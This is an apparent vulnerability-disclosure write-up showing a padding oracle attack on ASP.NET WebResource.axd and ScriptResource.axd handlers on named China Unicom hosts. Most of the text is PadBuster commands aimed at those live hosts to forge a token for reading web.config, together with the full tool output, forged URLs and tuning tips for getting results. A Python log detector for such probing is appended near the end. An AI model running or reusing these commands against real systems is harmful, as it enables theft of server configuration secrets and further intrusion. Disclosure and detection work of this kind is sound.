Exploitation process of a Padding Oracle Vulnerability (information disclosure) on a China Unicom monitoring platform
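Sensitive information disclosure
Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling
http://lar.unicomgd.com/
A vulnerability I reported last time:
http://wooyun.org/bugs/wooyun-
Today I was bored and went back through the vulnerabilities I had submitted before, to see whether any were still exploitable. And sure enough, there was one.
It is ASPX. When I saw that, my eyes lit up, and sure enough......
Let's look at the source code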
padBuster.pl http://lar.unicomgd.com/WebResource.axd?d=rF9mcFBXRdOs0vsKIxd7PQ2 rF9mcFBXRdOs0vsKIxd7PQ2 16 -encoding 3 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3
| Brian Holyfield - Gotham Digital Science
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
-------------------------------------------------------
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (146) [Byte 16]
[+] Success: (147) [Byte 15]
[+] Success: (240) [Byte 14]
[+] Success: (125) [Byte 13]
[+] Success: (246) [Byte 12]
[+] Success: (165) [Byte 11]
[+] Success: (108) [Byte 10]
[+] Success: (23) [Byte 9]
[+] Success: (21) [Byte 8]
[+] Success: (84) [Byte 7]
[+] Success: (56) [Byte 6]
[+] Success: (224) [Byte 5]
[+] Success: (241) [Byte 4]
[+] Success: (161) [Byte 3]
[+] Success: (40) [Byte 2]
[+] Success: (246) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 9a5bd382c8cc9d1f9af692
[+] Intermediate Bytes (HEX): e627affcec335e1c1f6ba3f379f39193
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: mlvTgsNEO34xCMydH5r2kgAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------
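Once the first key is worked out, the final key is not far off.
Second-step key:
http://lar.unicomgd.com/ScriptResource.axd?d=-_O5kfEIAgFdMPGupyOWH5pb04LDRDt-MQjMnR-a9pIAAAAAAAAAAAAAAAAAAAAA0
Many people say they run into this kind of vulnerability often but cannot get a result out of it. In my experience, the shorter the string after WebResource.axd?d=, the easier it is to get a result; if it is very long, the chance of getting the first-step key is fairly small.
Sometimes, when we run into a longer string, we can change the 3 in 16 -encoding 3 -plaintext "|||~/web.config" to another value, for example: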
-encoding [0-4]: Encoding Format of Sample (Default 0)
0=Base64, 1=Lower HEX, 2=Upper HEX
3=.NET UrlToken, 4=WebSafe Base64
When this error appears,
we can change the 16 in 16 -encoding 3 -plaintext "|||~/web.config" to the number suggested in the screenshot.
Proof of vulnerability:
There are two more:
http://a.unicomgd.com/
http://b.unicomgd.com/
padBuster.pl http://b.unicomgd.com/WebResource.axd?d=0Z76PrPlS9S1mTbXUM_z
q1EeJZK5v1hpHIarjgBsOKDz8UVvXS_FrmxDYqlAX3CedD0vtRtH3O5OAxQ-QwX8GL41uw41 0Z76PrP
lS9S1mTbXUM_zq1EeJZK5v1hpHIarjgBsOKDz8UVvXS_FrmxDYqlAX3CedD0vtRtH3O5OAxQ-QwX8GL4
1uw41 66 -encoding 0 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3
| Brian Holyfield - Gotham Digital Science
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
-------------------------------------------------------
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (255) [Byte 64]
[+] Success: (255) [Byte 63]
[+] Success: (255) [Byte 62]
[+] Success: (255) [Byte 61]
[+] Success: (255) [Byte 60]
[+] Success: (255) [Byte 59]
[+] Success: (255) [Byte 58]
[+] Success: (255) [Byte 57]
[+] Success: (255) [Byte 56]
[+] Success: (255) [Byte 55]
[+] Success: (255) [Byte 54]
[+] Success: (255) [Byte 53]
[+] Success: (255) [Byte 52]
[+] Success: (255) [Byte 51]
[+] Success: (255) [Byte 50]
[+] Success: (255) [Byte 49]
[+] Success: (255) [Byte 48]
[+] Success: (255) [Byte 47]
[+] Success: (255) [Byte 46]
[+] Success: (255) [Byte 45]
[+] Success: (255) [Byte 44]
[+] Success: (255) [Byte 43]
[+] Success: (255) [Byte 42]
[+] Success: (255) [Byte 41]
[+] Success: (255) [Byte 40]
[+] Success: (255) [Byte 39]
[+] Success: (255) [Byte 38]
[+] Success: (255) [Byte 37]
[+] Success: (255) [Byte 36]
[+] Success: (255) [Byte 35]
[+] Success: (255) [Byte 34]
[+] Success: (255) [Byte 33]
[+] Success: (255) [Byte 32]
[+] Success: (255) [Byte 31]
[+] Success: (255) [Byte 30]
[+] Success: (255) [Byte 29]
[+] Success: (255) [Byte 28]
[+] Success: (255) [Byte 27]
[+] Success: (255) [Byte 26]
[+] Success: (255) [Byte 25]
[+] Success: (255) [Byte 24]
[+] Success: (255) [Byte 23]
[+] Success: (255) [Byte 22]
[+] Success: (255) [Byte 21]
[+] Success: (255) [Byte 20]
[+] Success: (255) [Byte 19]
[+] Success: (255) [Byte 18]
[+] Success: (255) [Byte 17]
[+] Success: (255) [Byte 16]
[+] Success: (255) [Byte 15]
[+] Success: (255) [Byte 14]
[+] Success: (255) [Byte 13]
[+] Success: (255) [Byte 12]
[+] Success: (255) [Byte 11]
[+] Success: (255) [Byte 10]
[+] Success: (255) [Byte 9]
[+] Success: (255) [Byte 8]
[+] Success: (255) [Byte 7]
[+] Success: (255) [Byte 6]
[+] Success: (255) [Byte 5]
[+] Success: (255) [Byte 4]
[+] Success: (255) [Byte 3]
[+] Success: (255) [Byte 2]
[+] Success: (255) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): c3bcbdbcecb3a0a4e9aba6a4ada5aafffee1e0e3e2e5e4e7e6e9e
8ebeaedecefeed1d0d3d2d5d4d7d6d9d8dbdadddcdfdec1c0c3c2c5c4c7c6c9c8cbcacdcccf
[+] Intermediate Bytes (HEX): bfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7
d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfe
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: w7y9vOyzoKTpq6akraWq%2F%2F7h4OPi5eTn5uno6%2Brt7O%2Fu0dDT
0tXU19bZ2Nva3dzf3sHAw8LFxMfGycjLys3MzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D
-------------------------------------------------------
padBuster.pl http://a.unicomgd.com/WebResource.axd?d=yu_vV8xwAIAwLO27Y1AK
pzIXUt5GH41VdO_P9SEoF1Oi1m2S_pIUSIDbfqS2Hytam6SGX8Ccci--AT1U8BE0-t7YA1k1 yu_vV8x
wAIAwLO27Y1AKpzIXUt5GH41VdO_P9SEoF1Oi1m2S_pIUSIDbfqS2Hytam6SGX8Ccci--AT1U8BE0-t7
YA1k1 64 -encoding 0 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3
| Brian Holyfield - Gotham Digital Science
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
-------------------------------------------------------
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (255) [Byte 64]
[+] Success: (255) [Byte 63]
[+] Success: (255) [Byte 62]
[+] Success: (255) [Byte 61]
[+] Success: (255) [Byte 60]
[+] Success: (255) [Byte 59]
[+] Success: (255) [Byte 58]
[+] Success: (255) [Byte 57]
[+] Success: (255) [Byte 56]
[+] Success: (255) [Byte 55]
[+] Success: (255) [Byte 54]
[+] Success: (255) [Byte 53]
[+] Success: (255) [Byte 52]
[+] Success: (255) [Byte 51]
[+] Success: (255) [Byte 50]
[+] Success: (255) [Byte 49]
[+] Success: (255) [Byte 48]
[+] Success: (255) [Byte 47]
[+] Success: (255) [Byte 46]
[+] Success: (255) [Byte 45]
[+] Success: (255) [Byte 44]
[+] Success: (255) [Byte 43]
[+] Success: (255) [Byte 42]
[+] Success: (255) [Byte 41]
[+] Success: (255) [Byte 40]
[+] Success: (255) [Byte 39]
[+] Success: (255) [Byte 38]
[+] Success: (255) [Byte 37]
[+] Success: (255) [Byte 36]
[+] Success: (255) [Byte 35]
[+] Success: (255) [Byte 34]
[+] Success: (255) [Byte 33]
[+] Success: (255) [Byte 32]
[+] Success: (255) [Byte 31]
[+] Success: (255) [Byte 30]
[+] Success: (255) [Byte 29]
[+] Success: (255) [Byte 28]
[+] Success: (255) [Byte 27]
[+] Success: (255) [Byte 26]
[+] Success: (255) [Byte 25]
[+] Success: (255) [Byte 24]
[+] Success: (255) [Byte 23]
[+] Success: (255) [Byte 22]
[+] Success: (255) [Byte 21]
[+] Success: (255) [Byte 20]
[+] Success: (255) [Byte 19]
[+] Success: (255) [Byte 18]
[+] Success: (255) [Byte 17]
[+] Success: (255) [Byte 16]
[+] Success: (255) [Byte 15]
[+] Success: (255) [Byte 14]
[+] Success: (255) [Byte 13]
[+] Success: (255) [Byte 12]
[+] Success: (255) [Byte 11]
[+] Success: (255) [Byte 10]
[+] Success: (255) [Byte 9]
[+] Success: (255) [Byte 8]
[+] Success: (255) [Byte 7]
[+] Success: (255) [Byte 6]
[+] Success: (255) [Byte 5]
[+] Success: (255) [Byte 4]
[+] Success: (255) [Byte 3]
[+] Success: (255) [Byte 2]
[+] Success: (255) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): c3bcbdbcecb3a0a4e9aba6a4ada5aafffee1e0e3e2e5e4e7e6e9e
8ebeaedecefeed1d0d3d2d5d4d7d6d9d8dbdadddcdfdec1c0c3c2c5c4c7c6c9c8cbcacdcccf
[+] Intermediate Bytes (HEX): bfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7
d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfe
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: w7y9vOyzoKTpq6akraWq%2F%2F7h4OPi5eTn5uno6%2Brt7O%2Fu0dDT
0tXU19bZ2Nva3dzf3sHAw8LFxMfGycjLys3MzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D
-------------------------------------------------------
The final key was taking too long to run, so I stopped.
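Seen from the server side, each "[+] Success ... [Byte N]" line in the PadBuster output above costs up to 256 requests to the same .axd handler, each with a different d= value and most of them answered with an error. The following Python check for that pattern in web server logs is an added example, not part of the original report; the log field order, the thresholds and the sample lines are assumptions constructed for illustration.

```python
from collections import defaultdict
from urllib.parse import parse_qs

# Handlers named in the report; compared case-insensitively.
HANDLERS = ("/webresource.axd", "/scriptresource.axd")

def make_sample():
    """Constructed log lines (not from the report). Assumed field order:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status"""
    lines = ["#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status"]
    # Ordinary browser: a page load plus two resource fetches, all 200.
    lines.append("2013-01-01 10:00:00 198.51.100.7 GET /Default.aspx - 200")
    lines.append("2013-01-01 10:00:01 198.51.100.7 GET /WebResource.axd d=AAAA&t=1 200")
    lines.append("2013-01-01 10:00:01 198.51.100.7 GET /ScriptResource.axd d=BBBB&t=1 200")
    # Probing client: 300 distinct d= values, every one rejected.
    for i in range(300):
        status = 404 if i % 256 == 255 else 500
        lines.append(f"2013-01-01 10:05:00 203.0.113.9 GET /WebResource.axd d=tok{i:04d} {status}")
    return lines

def detect(lines, min_distinct=100, min_error_ratio=0.8):
    """Return {client_ip: (distinct_d_values, error_ratio)} for clients that
    sent many different d= tokens to the .axd handlers and mostly got errors."""
    stats = defaultdict(lambda: {"tokens": set(), "total": 0, "errors": 0})
    for line in lines:
        parts = line.split()
        if line.startswith("#") or len(parts) != 7:
            continue  # header or malformed line
        _, _, ip, _, stem, query, status = parts
        if stem.lower() not in HANDLERS or not status.isdigit():
            continue
        entry = stats[ip]
        entry["tokens"].add(parse_qs(query).get("d", [""])[0])
        entry["total"] += 1
        if int(status) >= 400:
            entry["errors"] += 1
    flagged = {}
    for ip, entry in stats.items():
        ratio = entry["errors"] / entry["total"]
        if len(entry["tokens"]) >= min_distinct and ratio >= min_error_ratio:
            flagged[ip] = (len(entry["tokens"]), round(ratio, 3))
    return flagged

if __name__ == "__main__":
    print(detect(make_sample()))
```

The thresholds (100 distinct tokens, 80% errors) are assumed starting points and should be tuned against normal traffic for the site being monitored.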
Remediation:
(C) 安全脉搏
